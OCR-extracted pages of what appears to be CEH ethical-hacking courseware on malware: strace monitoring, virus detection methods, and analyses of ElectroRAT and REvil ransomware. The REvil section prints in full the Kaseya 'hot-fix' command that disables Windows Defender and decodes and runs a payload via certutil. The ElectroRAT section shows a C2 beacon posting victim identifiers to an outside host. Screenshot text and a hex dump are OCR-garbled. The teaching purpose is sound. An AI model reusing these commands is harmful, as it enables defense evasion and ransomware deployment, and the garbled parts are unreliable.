Dynamic Malware Analysis: System Calls Monitoring strace strace intercepts and records the system calls by a Process and the signals received by the process
@ Syscallsor system calls act as an interface between the application and kernel @ It provides an interfacefor processes that are activated by an operating system
‘@
CE H
Monitoring system calls can help detect malware and understand its behavior
:
@ Itcan also reveal the type of damage the malware caused to the system
2
https://stroce.io
@ Tools such as strace can be used to view or trace the system callsin a Linux environment
System Calls Monitoring Syscalls or system calls act as an interface between an application and the kernel. It provides an interface for processes that are activated by an OS. System calls are generated by an application or program when it requires access to specific resources from the OS. They are usually generated during context switching from the user to kernel mode or kernel to user mode. The monitoring of system calls helps detect malware and in understanding the behavior of the detected malware. The monitoring of system calls can also reveal the type of damage caused to the system by the malware. Tools such as strace can be used to view or trace the system calls in a Linux environment.
=
strace Source: https://strace.io The strace tool intercepts and records system calls by a process and the signals received by the process. The name of each system call, its arguments, and its return value are printed on a standard error or to a file specified with the -o option. Run the following command for attaching the strace tool to the active process: strace
-p
Execute the following command path:
to view only system calls accessing a specific or given
strace
ls
-P
/var/empty
Run the following command to count time, calls, and errors for each system call: strace
Module 07 Page 1155 :
-c
ls
>
/dev/null
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Execute the following command to extract system calls and save the output in a text file: strace
-o
out.txt
./
root@ubuntu-Virtual-Machine: /home/ubuntu/strace# ps PID TTY TIME CMD 2930 pts/@ 60:00:00 sudo 2935 pts/@ 00:00:00 su 2936 pts/® 00:00 bash 3162
3230
pts/® pts/®
C
0© dbus-launch
00:00:00
ps
root@ubuntu-Virtual-Machine:/home/ubuntu/strace#|strace -p 2936] strace:
Process
2930
attached
ppoll([{fd=-1}, {fd=6, events=POLLIN}], 2, NULL, NULL,
Sf
Figure 7.110: Screenshot of strace
root@ubuntu-Virtual -Machtne: /home/ubuntu/strace# Is time seconds usecs/call calls errors
+00
0.600000
read write
e@ec0e00000000000000000
-000088 000000 800068 -000000 000000 -000088 -000068 -000068 000068 000060 000060 -000008 000068 -000000 000068 -000008 000000 000068 000000 000008 000000
222900000000000000000
+00 -00 -00 -00 -00 6.00 -00 +00 00 +00 -00 00 +00 -00 +00 -00 -00 +00 -00 +00 -00
close fstat
mmap
mprotect
munnap brk
rt_sigaction rt_stgprocmask toctl
pread64
access execve statfs
arch_pretl
getdents64
set_ttd_address openat set_robust_list prlimites 103
root@ubuntu-Virtual -Machine: /home/ubuntu/strace#
total
Figure 7.111: Screenshot showing the output of the strace command
Module 07 Page 1156
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Virus Detection Methods s
.
canning
Integrity
Checking
|
|
CE H
@ Once a virus is detected, it is possibleto write scanning programs that look for signature string characteristics of the virus
@
Integrity checking products work by reading the entire disk and recording integrity data that act as a signature
forthe files and system sectors
Interception | @ The interceptor monitors the operating system requests that are written to the disk |@ In code emulation techniques, the antivirus executes the malicious code insidea virtual machineto simulate CPU and memoryactivities |
Code
Emulation | © Thesetechniquesare considered very effective in dealing with encrypted and polymorphic viruses if the virtual machine mimics thereal machine .
Heuristic
Analysisis
|@ Heuristicanalysis can be staticor dynamic
5 7 i Instaticanalysis, the antivirus analyses the file format and code structureto determine 7if the code isfeiviral
|| 5 In dynamicanalysis, the antivirus performsa code emulation of the suspicious code to determine if the codes viral @
Virus Detection Methods The rule of thumb for virus and worm detection is that if an email seems suspicious (i.e., if the user is not expecting an e-mail from the sender and does not know the sender), or if the email header contains something that a known sender would not usually say, the user must be careful about opening the email, as there might be a risk of virus infection.
The best methods for virus detection are as follows: =
Scanning
=
Integrity checking
=
Interception
=
Code Emulation
=
Heuristic Analysis
Furthermore, a combination of these techniques can be more effective. =
Scanning A virus scanner is an essential software for detecting viruses. In the absence of a scanner, it is highly likely that the system will be attacked by a virus. Run antivirus tools
continuously and update the scan engine and virus signature database
on a regular
basis. Antivirus software is of no use if it does not know what to look for. The scanning for virus detection is performed in the following ways: o
Once a virus is detected in the wild, antivirus vendors across the globe identify its signature strings (characteristics).
Module 07 Page 1157 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
o
The vendors strings.
start writing
scanning
programs
that look for the virus’s signature
o
The resulting new scanners search memory files and system sectors for the signature strings of the new virus.
o
The scanner declares the presence of the virus once it finds and predefined viruses can be detected.
a match. Only known
Some critical aspects of virus scanning are as follows: Virus writers often create many new viruses by altering existing ones. It may take only a short time to create a virus that appears new but which is actually just a modification of an existing virus. Attackers make these changes frequently to confuse scanners. In addition, to enhance signature recognition, new scanners use detection techniques such as code analysis. Before investigating the code characteristics of a virus, the scanner examines the code at various locations in an executable file. Some scanners set up a virtual computer in a machine’s RAM and test the programs by executing them in this virtual space. This technique, called heuristic scanning, can also check and remove messages that might contain a computer virus or other unwanted
content.
Advantages of scanners o
They can check programs before execution.
o
They are the easiest way to check new software for known or malicious viruses.
Drawbacks of scanners
=
o
Old scanners may be unreliable. With the rapid increase in new viruses, old scanners can quickly become obsolete. It is best to use the latest scanners available in the market.
o
Because viruses are developed more rapidly compared to scanners for combating them, even new scanners are not equipped to handle every new challenge.
Integrity Checking o o
Integrity checking products perform their functions by reading and recording integrated data to develop a signature or baseline for those files and system sectors. A
disadvantage of a basic integrity checker is that corruption caused by a bug from that caused by a virus.
it cannot
differentiate
file
o
There are some advanced integrity checkers available for analyzing and identifying the types of changes made by viruses.
o
Some integrity checkers combine antivirus techniques with create a hybrid tool. This simplifies the virus checking process.
Module 07 Page 1158
integrity checking to
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
=
Interception
o
The primary objective of an interceptor is to deflect logic bombs and Trojans.
o
The interceptor controls requests to the OS for network access or actions that cause threats to programs. If it finds such a request, it pops up and asks if the user wants to allow the request to continue.
o
There is no reliable way to intercept direct branches to low-level instructions for input and output instructions by the virus.
o
Some viruses can disable the monitoring program itself.
code or direct
Code Emulation Using code emulation, antivirus software executes a virtual machine to mimic CPU and memory activities. Here, virus code is executed on the virtual machine instead of the real processor. Code emulation efficiently deals with encrypted and polymorphic viruses. After the emulator is run for a long time, the decrypted virus body eventually presents itself to a scanner for detection. It also detects metamorphic viruses (single or multiple encryptions). A drawback of code emulation is that it is too slow if the decryption loop is very long.
=
Heuristic Analysis This method helps in detecting new or unknown viruses that are usually variants of an already existing virus family. Heuristic analysis can be static or dynamic. In static analysis, the antivirus tool analyzes the file format and code structure to determine if the code is viral. In dynamic analysis, the antivirus tool performs code emulation of the suspicious code to determine if the code is viral. The drawback of heuristic analysis is that it is prone to too many false positives (i.e., it tags benign code as viral); thus, a user might mistrust a positive test result and mistakenly assume a false alarm when a real attack occurs.
Module 07 Page 1159
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
CEH
Trojan Analysis: ElectroRAT @ ElectroRAT, a Go-program-based RAT, is designed to be compatible with common operating systems such as Windows, macOS, and Linux @ Itis delivered through a downloadable application for cryptocurrency usersto steal their private keys and access their crypto wallets
Propagation @
e
Initial Propagation and
Infection
c 3)
Attackers create various
fake profiles on cryptocurrency forums and social media groupsto lure victims into visiting their websites and downloading malicious applications
Targets
(2]
Jammvapp eTraderapp
‘crypto-forum
© maintaining Persistence
r~
C3]
wright © by
Trojan Analysis: ElectroRAT (Cont’d) Stage 1: Initial Propagation and Infection | ElectroRAT is distributed through Trojanized crypto trade management applications such as Jamm, eTrader,
and DaoPoke
@ Victims are lured into downloading these applications after navigating from blockchain-based or crypto discussion forums acs siennaons
t
Victim downloads the app
Exploitation ‘Trojan logs the keystrokes and steals private/API keys for crypto login
Trojan resides as the background. process to maintain persistence
@ Cryptocurrency users © Cryptocurrency wallets
Deploying Malware
https: feybernt.cm,https://wrw.intezercom is Strict Prohibited.
CE H
Stage 2: Deploying Malware When the victim downloads andinstalls the malicious app, ElectroRAT is executed as a background process while displaying a decoy interface to the user The fake eTrader application now promptsthe victim to createa new user account and enter a password, making the application appear legitimate In the background, the ElectroRAT payload is downloadedand executed by launching the appropriate OS shell in a separate process
‘Single platform for control of all your crypto!
wright © by
Module 07 Page 1160
Ett
Reserved. Reproduction i tricty Prohibited.
al Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
. Trojan
__ Analysis:
ElectroRAT (Cont’d)
Stage 3: Exploitation @
lCE
The fake application lures the victims into connecting to
their cryptocurrency exchange accounts to record their
credentials or API keys
| Italso performs other functionalities such as uploading/downloading files, capturing screenshots, and running commands on the victim’s console
H
Stage 4: Maintaining Persistence @
Commandand control (C2) activity is initiated with an HTTP POST
request sentbythe fake application, which includesthe victim’s
identifiers, through TCP port 3000 by using the same servers that
were used to host the fake application |@ When the 2 server receivesthe request, it respondswith an emptyJSON response Attackers abuse victims’ identitiesto make illegitimate transactionsover time and send malware spam
Al Rights Reserved Reproduction is St
Trojan Analysis: ElectroRAT Source: https://cyberint.com, https://www.intezer.com ElectroRAT, a Go-program-based RAT, is designed to be compatible with common OSes such as Windows, macOS, and Linux. The Trojan is delivered through a downloadable application to cryptocurrency users for the malware creators to steal the private keys of victims and access their crypto wallets. The Trojan can be appended with trading applications, which can be promoted via anonymous or fake profiles through specific blockchain/cryptocurrency forums or social media platforms. After a successful attempt, the Trojanized applications load a decoy GUI on the victim machines, where ElectroRAT begins its operation as a background process to
conceal its presence. Propagation
Attackers create a variety of fake profiles on cryptocurrency forums and social media groups to lure victims into visiting their websites and downloading malicious applications.
Module 07 Page 1161 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
(1)
Initial Propagation and
(2)
Infection
left
Hosted on
Jamiivapp_ eTrader app
Deploying Malware
:
PA Crypto-forum
Victim downloads the app
(4) Maintaining Persistence
(3)
Exploitation
Trojan logs the keystrokes and steals private/API keys for crypto login
Trojan resides as the background process to maintain persistence
Figure 7.112: Process flow of an ElectroRAT infection
ElectroRAT Malware Attack Phases The following are the various stages involved in an ElectroRAT malware attack: =
Stage-1: Initial Propagation and Infection
Attackers have created different Trojanized applications for each of the major OSes: Windows, Linux, and macOS. ElectroRAT is distributed through these Trojanized crypto trade management applications such as Jamm and eTrader as well as cryptocurrency poker apps such as DaoPoker. Victims are lured into downloading these applications from blockchain-based or crypto discussion forums such as Bitcoin Talk and SteemCoinPan or Twitter/Telegram campaigns. The following screenshots show Jamm and eTrade applications hosted on the web:
ti
| =
-
Se
Best app to trade
and manage your crypto
) =
Fca
Figure 7.113: eTrader hosted on the Kintum homepage
Module 07 Page 1162
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
O vomm
a)
"14,3710 >
Single platform for control of all your crypto!
Q cowmiono ror inux
Figure 7.114: Homepage for the Jamm application
The following screenshots show promotional posts of these Trojanized applications by a fake user, from which victims are lured into the above pages to download the applications.
Trade on all cryptocurrency exchanges through one interface and discover the best opportunities to maximize your profits! anri.rixardinh [-3 | + May 24, 2020 HIVE CN Chinese Community Community
se | sewonos |
Good afternoon, in this topic, we are going to explain the main issues (technically) of trading in the cryptocurrency
market. And tell you a decision we made to help all traders best manage and monitor your cryptocurrency assets. No trouble and freedom. We hope to share our work with industry experts and receive feedback and suggestions for improving services. https://kintum.io What is Kintum?
The Kintum platform is an ideal tool for multiple exchange transactions on one interface. You can use services such as graphical indicators, trading via API orders, portfolio management arbitrage trading, etc. All of these are in one window. Currently, more than 20 cryptocurrency exchanges such as Binance, Kraken, Bitfinex, Poloniex, Coinbase Pro, etc. are cooperating with us. Figure 7.115: Screenshot of a cryptocurrency forum promoting the eTrader application
Module 07 Page 1163
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
tx simple machines forum.
‘October 24, 2020, 05:45:57 PM Welcome, Guest. Please lovin or resister News: Latest Btcoin Core relesse: 0.20.0 [Torrent]
2
(searen_]
& show Posts ‘Altemate crvstocurrences
/ Speculation (Altoins)/ Jamm - eryptocurrency trading bot
on: Todayat 05:39:45 PM
Single platform for control of all your crypto!
Jamm provides the user with convenient and powerful tools for trading, storing, exchanging and tracking their crypto assets! Use Jamm and give yourself great flexibility and convenience in many cryptocurrency operation! CRYPTO EXCHANGES Users can quickly transfer existing crypto assets from other sources. CRYPTO WALLETS Users can buy, transfer, and trade crypto assets across exchanges. DAPPS DApp users can quickly transfer their cryptocurrency to power your app. CRYPTO PORTFOLIOS. Investors can connect to exchanges and understand their crypto holdings and performance. TRADING PLATFORMS ‘Traders can transfer crypto assets between exchanges, execute trades and connect and consolidate trading history ‘and balance info. + TREASURY MANAGEMENT Companies can get a complete picture of crypto holdings across exchanges, transfer funds, and execute trades. Ready to get started? + + + + +
Jamm.to
Figure 7.116: Screenshot of Bitcoin forum promoting the Jamm application
The following screenshot shows a social media account promoting DaoPoker. The fake user account was suspended because of reports from users. é
DaoPoker
(000) ( Follow )
Disco d.gq/8qjPXuUg Telegramm - t.me/Daopoker
Figure 7.117: Social media account promoting the DaoPoker app
Module 07 Page 1164
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
For maximum damage, these fake applications have been created in Electron, a crossplatform framework that was developed using HTML and JavaScript. =
Stage-2: Deploying Malware When a victim downloads and installs the malicious eTrader application, ElectroRAT executes as a background process while displaying a decoy interface to the user. ElectroRAT runs behind the system while the GUI is operated from the front-end application. @@ eTrader Setup
-
Installing, please wait...
eer Figure 7.118: Screenshot of the fake eTrader application installation
The fake eTrader application now prompts the victim to create a new user account and enter a password, which makes the application appear legitimate.
Create your account Create passcode for your new account
Figure 7.119: Screenshot of the fake eTrader application creating a user account
In the background, the ElectroRAT payload is downloaded and executed by launching the appropriate OS shell in a separate process with the window hidden, as can be seen by unpacking the fake application to reveal the Electron JavaScript file electron.js.
Module 07 Page 1165
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
function launchWorker() witch (os.platform())
{
0 spawn( path. join(rootPath, Ol.
spawnOptions 0 ( path. join(resourcesPath, (1,
detached: true,
Figure 7.120: Screenshot of Electron showing how the fake eTrader application spawns ElectroRAT
The fake eTrader application mimics legitimate applications, convincing victims to interact with it. The following screenshot shows the appearance of the eTrader application upon its execution. eTrader i Market Scanner
@
Market & Pairs
Figure 7.121: eTrader application with decoy content
Module 07 Page 1166
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
Stage-3: Exploitation The fake application further lures the victims into connect exchange accounts to record their credentials or API keys.
to their cryptocurrency
© cTrader
=o
Paste in API keys to connect ‘exchange accounts:
x
How to generate API key?
Figure 7.122: eTrader application collecting credentials and API keys
In the background, ElectroRAT captures keyboard entries to steal the private keys of the victims. Apart from keylogging, the Trojan facilitates other functionalities for remote attackers to upload and download files from the disk, capture screenshots, and run commands on the victim console. =
Stage 4: Maintaining Persistence
Command-and-control (C2) activity is initiated with an HTTP POST request sent by the fake application, which includes victim identifiers, through TCP port 3000 using the same servers that were used to host the fake application. When the C2 server receives the request, it provides an empty JSON response.
Module 07 Page 1167
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
POST /user HTTP/1.1 Host: 213.226.100.140:3000 User-Agent: go-resty/1.12.0 (https://github.com/go-resty/resty) Content-Length: 137 Accept: application/json Content-Type: application/json Accept-Encoding: gzip
{(id" :"36d1130a-acze-44f7-9de1",mac_name”:" HTTP/1.1 260 OK Access-Control-Allow-Origi DELETE GET,HEAD,PUT,POST, Access-Control-Allow-Methods: charset=utf-8 application/json; Content-Type: Content-Length: 2 Date: Tue, @3 Nov 2620 04:25:06 GIT Connection: keep-alive oO
,"os_version":"6.1.7601","user_name":"
\user","
Figure 7.123: Initial beacon and C2 response
As the Trojan resides as a background process, the remote attackers use the victim systems for additional promotion using their identities to make illegitimate transactions over time, send malware spam, and so on.
Module 07 Page 1168
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
CEH
Virus Analysis: REvil Ransomware
@ REvil, also known as Sodinokib, is dangerous ransomware associated with the GOLD SOUTHFIELD threat group that provides ransomware as a service for performing targeted attacks @ Attackers spread REvil via RDP servers, exploit kits, and backdoor softwareinstallation programs REvil Ransomware Attack Stages
Operation
|G REvil uses tools such as FileZilla to exfiltrate data and PsExec for the remote execution of the ransomware and its files
Execution and Lateral Movement
Other tools used by REvil include PC Hunter, AdFind, BloodHound, NBTScan, SharpSploit, third-party file sync tools, and Qakbot, a Trojan used to deliver ransomware
PC Hunter
Target Industries
REvil/Sodinokibi Ransomware nN
Transportation Financial sector
Oil and gas Technology Healthcare Manufacturing and so on
Defense Evasion and Discovery
Spam Email
Process Hacker
Download and Execute
Drive-by Compromise
CertUtil
B e f PowerShell
Pa
Killa
‘tps: log. guys com, hips Jan tenamera com
REvil Ransomware Attack Stages: Initial Access @ Attackers employa variety of techniques such as spam/spear-phishingemails with malicious attachments, RDP exploitation using valid accounts, and compromised websitesto gain initialaccess (@ These techniques allow attackers to download and execute malicious payloads on the victim machine using toolssuch as CertUtil and PowerShell
@ A recent approach followed by attackers for supply-chain compromisesto install Sodinstall or Sodinokibi on the target systems
REvil Ransomware Attack
‘Supply-chain compromise
"
Flow on KaseyaVSA | * creromsefie Servers
Module 07 Page 1169
and/or sites from a supplier’s auto-update feature © Uses CVE-2021-30116 tocompromisethe Kaseya VSA servers
CertUtil/PowerShell
SODINSTALL
© Executes additional PowerShell scripts for disabling Windows Defender and shell commands to launch the next stage of the attack using CertUtilto decrypt and execute “agent.exe” (SODINSTALL)
© Drops and executes MsMpend.exe and mpsvc.dl (Sodinokibi DLL) via DLL sideloading
REvil/Sodinokibi © Encryption @ Safeboot routine
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
REvil Ransomware Attack Stage: Download
and Execution
CE H
(@ The following are the methods used to download and execute the malicious payload ©
CVE-2019-2725: This method involves the remote code execution (RCE) of CertUtil or PowerShellto download and
execute REvil
@ Malspam: It uses macrosto download and execute REvil. Further, malspam includesan attachment (e.g., a POF file) thats used to download Qakbotand other components of the malware © Drive-by compromise directly downloads REvil © CVE-2018-13379, CVE-2019-11510, and valid accounts: This method uses RDP and PsExec to download and execute other componentsofthe malware @ DLL sideloading: This method uses MsMpeng.exe to load an REvil DLL that masqueradesas a legitimate DLL such as MpSve.dll, whichis dropped viaa customized installer such as “SODINSTALL” © CVE-2021-30116: This method exploitsa zero-day vulnerability against Kaseya VSA servers by compromisingthe Kaseya supply chain
@ In this phase, the ransomware is dropped along with its components and executed on the target systems
@ For example, in the Kaseya supply-chain compromise, after dropping the payload, it removes previously used binaries such as agent.crt and certutil.exe
|@ The decoded agent.exe comprises internal components such as SOFTIS and MODLIS
that are dumped into the Windows folder in the form of MsMpEng.exe and mpsvc.dll |@ As soon as MpMseng.exe executes and
invokes the export function (ServiceCrtMain), the REvil encryptor (mpsve.dll) loads and executes itself
Module 07 Page 1170
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
REvil Ransomware Attack Stage: Exploitation (Cont’d)
CE H
@ Now, REvil exploits Openssl to encrypt files @ The ransomwareallocates memory and drops the actual payload using functions such as “CreateFileMappingW” and “MapViewOfFile” ‘@ Now, REvil exposesits ransom
behavior by changing the configfiles, changinglocal firewallrules, creating its own registry keys, and addingits own valuesto the registry keys
‘@ Attackers now automatically log into
the victim’ssystem with their own accounts, encryptall the confidential files of the victim, and displaya ransom note
REvil Ransomware Attack Stages: Lateral Movement / Defense
cE H
Evasion and Discovery
| Lateral Movement
@ Attackers perform lateral movement in targeted attacks, in which they use RDP and PsExec tools for lateral movement
Defense Evasion and Discovery
@ At this stage, attackers use network discovery tools such as AdFind, SharpSploit, discover and infect other systems connected to the target network
BloodHound, and NBTScan to
@ The following techniques are used by REvil for defense evasion: © PC Hunter and Process Hacker to identify and terminate services and processes related to antivirus products © KillAV, a custom malicious binary designed to uninstall antivirus products © Safeboot routine, which is triggered when “-smode” is supplied as an argument and creates various new variants with RunOnce registries to restart from or to Safemode and bypass security solutions © DLL sideloading to bypass detection by runningas a legitimate file or process © PowerShell commands to compromise the supply chain and disable Windows Defender
Module 07 Page 1171
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
REvil Ransomware Attack Stages: Credential Access and Exfiltration / Command and Control
cE H om
Credential Access and Exfiltration
@ Attackers use tools such as SharpSploit, an attack framework, along with the mimikatz module to gain credential access
|@ The gathered information is exfiltrated using different methods such as FTP transfer via FileZilla or using thirdparty synchronization tools such as MegaSync, FreeFileSync, and Rclone Command and Control (C2)
@ At this stage, the REvil ransomware sends a report and system information to the attackers’ command and control server. | This is performed by creating a pseudorandom URL based on the following fixed format: @ https://{Domain}/{String 1}/{String 2}/{random characters}. {String 3}
Virus Analysis: REvil Ransomware Source: https://blog.qualys.com, https://www.trendmicro.com REvil, also known as Sodinokib, is dangerous ransomware associated with the GOLD SOUTHFIELD threat group that provides ransomware as a service (RaaS) for performing targeted attacks against multi-national companies. Attackers distribute this malware through supply-chain attacks (type of zero-day attacks), which requires the modification of code in third-party vendor software that is purchased by organizations according to their requirement. The threat group can also spread this malware via RDP servers, exploit kits, and backdoor software installation programs. REvil involves double extortion in its schemes, using stolen files to persuade its victims to pay a ransom. Attackers have performed bold attacks on popular public figures and organizations using REvil. The threat group exfiltrates critical information before encrypting it and threatens victims with the disclosure of their personal information on the dark web, underground forums, and blog sites. REvil Ransomware Operation
Attackers perform DDoS attacks on the target and directly communicate with the victim’s customers, business partners, and the media to force victims to pay a ransom. Further, attackers conduct auctions of the victim’s data to pressurize the victim further. It is highly targeted ransomware, in which attackers use highly sophisticated tools and employ customized infection chains to perform targeted attacks. REvil uses tools such as FileZilla to exfiltrate data and PsExec for the remote execution of the ransomware
and
its files. Other tools used
by REvil include
PC Hunter, AdFind,
NBTScan, SharpSploit, third-party file sync tools, and Qakbot, ransomware. Module 07 Page 1172
which
BloodHound,
is a Trojan to deliver
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
REvil Ransomware Attack Stages Execution and Lateral
Initial Access
Movement
*
B
t--p
Defense Evasion and Discovery
Fr Ss
RDP/Valid accounts
PC Hunter
REvil/Sodinokibi Ransomware
Spam Email
Process Hacker
Hi
Download and Execute
Drive-by Compromise
CertUtil
2
PowerShell
ef
Kill|AV
Figure 7.124: Attack stages of REvil ransomware
Supply-chain
CertUtil/PowerShell
compromise
© Arrives via compromised files
©
and/or sites froma
supplier's auto-update feature
© Uses CVE-2021-30116 to compromise the
Kaseya VSA servers
Executes additional PowerShell scripts for
disabling Windows
Defender and shell commands to launch
SODINSTALL
© Drops and executes MsMpend.exe and mpsvc.dll (Sodinokibi DLL) via DLL sideloading
REvil/Sodinokibi
@ Encryption @ Safeboot routine
the next stage of the attack using CertUtil to decrypt and execute
“agent.exe”
(SODINSTALL)
Figure 7.125: Specific attack flow of REvil ransomware on Kaseya VSA servers
=
Initial Access
To gain initial access, attackers employ various techniques such as spam/spear-phishing emails with malicious attachments, RDP exploitation using valid accounts, compromised websites, and so on. These techniques allow attackers to download and execute malicious payloads on the victim machine using tools such as CertUtil and PowerShell.
Module 07 Page 1173
Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohibi
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Attackers also perform more targeted attacks using RDP and PsExec to gain complete control of the target network and deploy malicious payloads. A recent approach followed by attackers to perform supply-chain compromise is to install Sodinstall or Sodinokibi on the target systems. For example, REvil threat actors previously used a Kaseya VSA zero-day vulnerability (CVE-2021-30116) to gain initial access to the Kaseya VSA server platform. =
Download and Execution The following are the common malicious payload.
methods
used
by REvil to download
and
execute
a
©
CVE-2019-2725: This method involves the remote code execution (RCE) of CertUtil or PowerShell to download and execute REvil.
o
Malspam: This method uses macros to download and execute REvil. Further, malspam includes an attachment (for example, a PDF file) that is used to download Qakbot and other components of the malware.
o
Drive-by Compromise: This method directly downloads REvil.
o
CVE-2018-13379, CVE-2019-11510, and Valid Accounts: This method uses RDP and PsExec to download and execute other components of the malware such as antivirus, exfiltration tools, and REvil.
©
DLL Sideloading: This method uses a legitimate executable such as MsMpeng.exe to load an REvil DLL that masquerades as a legitimate DLL such as MpSvc.dll, which is dropped via a customized installer such as SODINSTALL.
©
CVE-2021-30116: This method exploits a zero-day vulnerability against Kaseya VSA servers via Kaseya supply-chain compromise. It drops the payload to Kaseya’s TempPath with the file name agent.exe. The VSA procedure used to deploy the encryptor was named “Kaseya VSA Agent Hot-fix.” The Kaseya VSA Agent Hot-fix procedure runs the following command: "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 Cc: \Windows\System32\WindowsPowerShell\v1.0\powershell.exe MpPreference
-DisableRealtimeMonitoring
DisableIntrusionPreventionSystem
$true
>
$true
-DisableIOAVProtection
nul & Set$true
-DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled SubmitSamplesConsent NeverSend & copy 1%
Cc: \Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\\agent.crt c:\\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\\agent.exe”
The above command also replaces certutil.exe with the environment variable %SystemDrive%\cert.exe and then decodes the agent.crt file to agent.exe, which then drops another payload to avoid detection. agent.exe
d55£983c994caal
Module 07 Page 1174
60ec63a5 9f 6b4250fe67 Fh3e8c43a388aec60a4a6978e9F1le
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
Exploitation In this phase, the ransomware is dropped along with its components and executed on the target systems. For example, in the Kaseya supply-chain compromise, after dropping the payload, removes previously used binaries such as agent.crt and certutil.exe. The decoded agent .exe comprises internal components such as SorTis and MoDLIS, as shown in the screenshot. 43 "MODLIS" =
© 102 - [lang:1033]
*SoFTIs" {© 101 -[lang:1033]
a i Offset doo00000 ooooo010 ooooo020 ooo00030 ooooo040 ooooo0so ooooo060 oo000070 ooooo080 ooooo030 ooooo0a0 ooo000B0 oogooaco oooo00D0 oooo00ED ooooo0Fo 0000100 ooo00110 00000120 00000130 oo000140, oooo01so ooo00160 00000170 ooooo180 00000130 ooo001a0 oo0001B0 oooo01co o00001D0 oog001E0 oo0001FO oo000200 00000210 00000220 00000230 ooo00240 ooo00250 00000260 00000270 ooo00280 0000290 ooo002a0 o00002B0 ooo002co ooo002D0 o00002E0 oo0002Fo ooo00300 00000310 00000320 00000330 00000340 00000350 ooo00360, 00000370 oo000380 00000330 ooo003a0 000003B0
0 aD BE 09 oo OE 69 74 6D AS az az ES EC EC 00 6a OB Es 00 0s AG 00 30 00 oo 00 00 50 00 00 2E oo 00 64 00 2E oo 00 00 00 00 00 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1 oy 00 00 0 1F 73 20 6F 78 48 48 61 4B 4B 0 B7 on FC 10 00 SB a0 BF 00 3E 00 00 BS 20 a0 74 OE 00 ag 00 64 20 00 61 00 00 00 0 00 00 0 00 00 0 00 00 00 00 00 00 00 00 0 00 00
ie 2 30 00 00 00 BA 20 62 64 DA SS S4 27 5 6A 00 DD oc 05 00 on oc 10 09 00 oc 00 00 09 07 00 65 07 00 02 00 61 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
3 00 00 00 00 OE 70 65 65 86 DS DS DS DS DS 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
